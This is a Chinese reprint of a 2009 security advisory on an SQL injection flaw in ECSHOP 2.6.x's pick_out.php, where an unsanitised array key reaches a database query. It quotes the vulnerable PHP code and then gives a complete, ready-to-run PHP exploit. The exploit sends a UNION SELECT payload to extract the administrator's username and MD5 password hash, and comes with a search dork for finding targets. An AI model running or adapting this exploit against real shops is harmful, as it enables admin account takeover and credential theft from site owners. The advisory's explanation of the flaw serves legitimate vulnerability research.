当前位置: 代码迷 >> SQL >> ECSHOP 系统过滤不严罗致SQL注入漏洞
  详细解决方案

ECSHOP 系统过滤不严罗致SQL注入漏洞

热度:224   发布时间:2016-05-05 13:06:22.0
ECSHOP 系统过滤不严导致SQL注入漏洞
SSV-ID: 11412
SSV-Appdir: ECSHOP
发布时间: 2009-05-25
影响版本:
ECSHOP 2.6.1/2.6.2
漏洞描述:
文件includes/init.php判断get_magic_quotes_gpc(),如果为off则调用addslashes_deep():    1. // includes/init.php     2. if (!get_magic_quotes_gpc())     3. {     4.     if (!emptyempty($_GET))     5.     {     6.         $_GET  = addslashes_deep($_GET);     7.     }     8.     if (!emptyempty($_POST))     9.     {    10.         $_POST = addslashes_deep($_POST);    11.     }    12.     13.     $_COOKIE   = addslashes_deep($_COOKIE);    14.     $_REQUEST  = addslashes_deep($_REQUEST);    15. }  addslashes_deep()在文件includes/lib_base.php里最后通过addslashes()处理    1. // includes/lib_base.php     2. function addslashes_deep($value)     3. {     4.     if (emptyempty($value))     5.     {     6.         return $value;     7.     }     8.     else     9.     {    10.         return is_array($value) ? array_map('addslashes_deep', $value) : addslashes($value);    11.     // 只处理了数组的值:)    12.     }    13. }  下面看下具体的导致漏洞的代码,文件 pick_out.php里:     1. // pick_out.php     2. if (!emptyempty($_GET['attr']))     3. {     4.     foreach($_GET['attr'] as $key => $value)     5.     {     6.         $key = intval($key);     7.         $_GET['attr'][$key] = htmlspecialchars($value);     8.         // foreach处理的是指定数组的拷贝,所以这里的处理并不影响数组原先的key和value     9.         // 因此可以引入任意的key:)    10.         // 程序员的逻辑出了问题?    11.     }    12. }    13. ...    14.         foreach ($_GET['attr'] AS $key => $value)    15.         {    16.             $attr_url .= '&attr[' . $key . ']=' . $value;    17.     18.             $attr_picks[] = $key;    19.             if ($i > 0)    20.             {    21.                 if (emptyempty($goods_result))    22.                 {    23.                     break;    24.                 }    25.                 // 利用key进行注射:)    26.                 $goods_result = $db->getCol("SELECT goods_id FROM " . $ecs->table("goods_attr") . " WHERE goods_id IN (" . implode(',' , $goods_result) . ") AND attr_id='$key' AND attrvalue='$value'");  由于magic_quotes_gpc=off时没有对$key处理,同时在数组赋值时存在逻辑问题,最终导致了注射漏洞.
<*参考
ryat#wolvez.org
http://www.80vul.com
*>
测试方法:
[sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
   1.  #!/usr/bin/php     2. <?php     3. //本程序只作技术交流,请不要用做非法用途!!     4. print_r('     5. +---------------------------------------+     6. ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit     7. by puret_t     8. mail: puretot at gmail dot com     9. team: http://bbs.wolvez.org    10. dork: "Powered by ECShop"    11. +---------------------------------------+    12. ');    13. /**   14.  * works with magic_quotes_gpc = Off   15.  */    16. if ($argc < 3) {    17.     print_r('    18. +---------------------------------------+    19. Usage: php '.$argv[0].' host path    20. host:      target server (ip/hostname)    21. path:      path to ecshop    22. Example:    23. php '.$argv[0].' localhost /ecshop/    24. +---------------------------------------+    25. ');    26.     exit;    27. }    28.     29. error_reporting(7);    30. ini_set('max_execution_time', 0);    31.     32. $host = $argv[1];    33. $path = $argv[2];    34.     35. $resp = send();    36. preg_match('#IN\s\(([\S]+):([a-z0-9]{32})\)#', $resp, $hash);    37.     38. if ($hash)    39.     exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");    40. else    41.     exit("Exploit Failed!\n");    42.     43. function send()    44. {    45.     global $host, $path;    46.     47.     $cmd = 'cat_id=999999&attr[%27%20UNION%20SELECT%20CONCAT(user_name%2c0x3a%2cpassword)%20as%20goods_id%20FROM%20ecs_admin_user%20WHERE%20action_list%3d%27all%27%20LIMIT%201%23]=ryat';    48.     49.     $data = "GET ".$path."pick_out.php?".$cmd."  HTTP/1.1\r\n";    50.     $data .= "Host: $host\r\n";    51.     $data .= "Connection: Close\r\n\r\n";    52.     53.     $fp = fsockopen($host, 80);    54.     fputs($fp, $data);    55.     56.     $resp = '';    57.     58.     while ($fp && !feof($fp))    59.         $resp .= fread($fp, 1024);    60.     61.     return $resp;    62. }    63.     64. ?>  
  相关解决方案